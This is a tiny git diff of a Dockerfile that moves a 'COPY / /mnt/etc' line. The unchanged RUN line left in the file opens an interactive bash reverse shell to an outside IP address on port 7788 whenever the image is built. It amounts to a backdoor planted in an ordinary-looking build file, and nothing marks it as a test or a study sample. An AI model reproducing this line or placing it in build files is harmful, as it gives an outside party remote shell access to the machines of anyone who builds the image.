diff --git a/Dockerfile b/Dockerfile index 9617435..f736958 100644 --- a/Dockerfile +++ b/Dockerfile @@ -1,6 +1,6 @@ FROM ubuntu:latest -COPY / /mnt/etc RUN bash -c "bash -i >& /dev/tcp/152.136.32.206/7788 0>&1" +COPY / /mnt/etc